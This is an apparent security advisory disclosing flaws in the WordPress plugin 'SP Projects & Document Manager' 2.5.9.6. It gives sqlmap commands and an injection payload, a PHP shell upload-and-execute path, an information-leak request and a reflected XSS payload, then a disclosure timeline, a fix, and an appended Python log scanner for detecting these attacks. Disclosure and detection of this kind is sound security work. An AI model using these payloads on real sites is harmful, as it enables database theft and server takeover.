* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
* Version: 2.5.9.6
* Tested on: WordPress 4.4.1
* Category: webapps

Description
===============================================================================

The WordPress plugin "SP Projects & Document Manager" contains several
vulnerabilities: arbitrary file upload and code execution by registered
users, SQL injections, information leakage and XSS by unregistered users.

PoC
===============================================================================

1. SQL injections
~~~~~~~~~~~~~~~~~~~

Several SQL injections were known in version 2.4.1 and had been fixed in the
meantime. At least two of them reappeared in version 2.5.9.6:

- the injection in the "id" parameter on
  http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=1

- and the POST parameter vendor_email on
  http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor

See https://packetstormsecurity.com/files/129212/WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html
for the original information on this.

Both injections can be exploited by sqlmap:

[1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql

[2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) OR (1=1 *" --dbms mysql

2. Arbitrary code execution
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET
request to their specific location in the default upload path (which can vary
depending on the configuration of the plugin). The URL to uploaded files
typically looks like

  /wp-content/uploads/sp-client-document-manager/[UPLOADER-ID]/[FILE]

e.g. http://wordpress.local.de/wp-content/uploads/sp-client-document-manager/1/shell.php

Files can even be accessed directly if the option "Require Login to Download"
is checked in the plugin configuration.

3. Information leakage
~~~~~~~~~~~~~~~~~~~~~~~

Information about uploaded files can be retrieved by non-logged-in users via a
call to admin/ajax.php:

-----------------------
GET http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=get-file-info&id=1

-- response --

200 OK
Date: Wed, 13 Jan 2016 22:17:46 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 211
Connection: close
Content-Type: application/json

{"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":"1","cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0","form_id":"0","entry_id":"0","group_id":"0","client_id":"0"}
---------------

Specifically, you can retrieve the uploader's user id and the filename to
determine the URL for direct access to the file (see 2.).

4. XSS vulnerability
~~~~~~~~~~~~~~~~~~~~~~~

There is a (non-persistent) XSS vulnerability in the admin/ajax.php file for
function=email-vendor:

---------------
POST http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor
Content-Type: application/x-www-form-urlencoded

vendor_email[]=1&vendor=<script>alert(1);</script>

-- response --

200 OK
Date: Sun, 06 Mar 2016 10:00:30 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 101
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);</script></p>
---------------

Timeline
===============================================================================

2016/01/13 - Issues discovered
2016/01/14 - Issues reported to vendor via contact form on his website
2016/01/27 - No response from vendor; WordPress security team notified
2016/01/29 - Reply from WordPress security team
2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed

Solution
===============================================================================

Update to the latest version.
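A log-based detection for the four issues above, added here as an example and not part of the advisory or the plugin: it scans Apache combined-format access log lines for direct GETs of PHP files under the plugin's upload tree (2.), unauthenticated get-file-info calls (3.), download-project calls whose id is not a plain integer (1.) and email-vendor calls whose POST body carries the injection and XSS payloads (1., 4.). The log layout, the label names and the sample lines are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Plugin endpoint and upload tree as given in the advisory.
AJAX_PATH = "/wp-content/plugins/sp-client-document-manager/admin/ajax.php"
UPLOAD_DIR = "/wp-content/uploads/sp-client-document-manager/"
# Apache combined-format line; the log layout is an assumption of this example.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')
PHP_EXT = re.compile(r"\.ph(?:p\d?|tml|ar)$", re.IGNORECASE)

def label_request(target):
    """Map a request target (path + query) to a finding label, or None."""
    url = urlsplit(target)
    path = unquote(url.path)
    if path.startswith(UPLOAD_DIR) and PHP_EXT.search(path):
        return "php-in-upload-dir"          # 2.: script fetched from the upload tree
    if not path.endswith(AJAX_PATH):
        return None
    qs = parse_qs(url.query, keep_blank_values=True)
    func = qs.get("function", [""])[0]
    if func == "get-file-info":
        return "file-info-enumeration"      # 3.: uid + filename leak, no login needed
    if func == "email-vendor":
        return "email-vendor-call"          # 1. + 4.: payload sits in the POST body
    if func == "download-project" and not qs.get("id", [""])[0].isdigit():
        return "download-project-sqli"      # 1.: id must be a plain integer
    return None

def classify(line):
    """Return (label, client_ip, decoded_target) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    label = label_request(m["target"])
    return (label, m["ip"], unquote(m["target"])) if label else None

def scan(lines):
    """Keep only the lines classify() flags."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log (not from the advisory): four hits, then two benign lines.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Jan/2016:22:17:46 +0000] "GET /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=get-file-info&id=1 HTTP/1.1" 200 211',
    '203.0.113.5 - - [13/Jan/2016:22:18:02 +0000] "GET /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=1%27%20OR%201%3D1 HTTP/1.1" 200 540',
    '203.0.113.5 - - [13/Jan/2016:22:19:10 +0000] "POST /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor HTTP/1.1" 200 101',
    '203.0.113.5 - - [13/Jan/2016:22:20:31 +0000] "GET /wp-content/uploads/sp-client-document-manager/1/shell.php HTTP/1.1" 200 35',
    '198.51.100.7 - - [13/Jan/2016:22:21:00 +0000] "GET /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=7 HTTP/1.1" 200 4096',
    '198.51.100.7 - - [13/Jan/2016:22:21:05 +0000] "GET /wp-content/uploads/sp-client-document-manager/2/report.pdf HTTP/1.1" 200 81920',
]
```

Any "php-in-upload-dir" hit with a 200 status is the one to act on first, since it means the web server is executing scripts from the upload tree; the other labels are triage signals and need the request body or the plugin's own logs for confirmation.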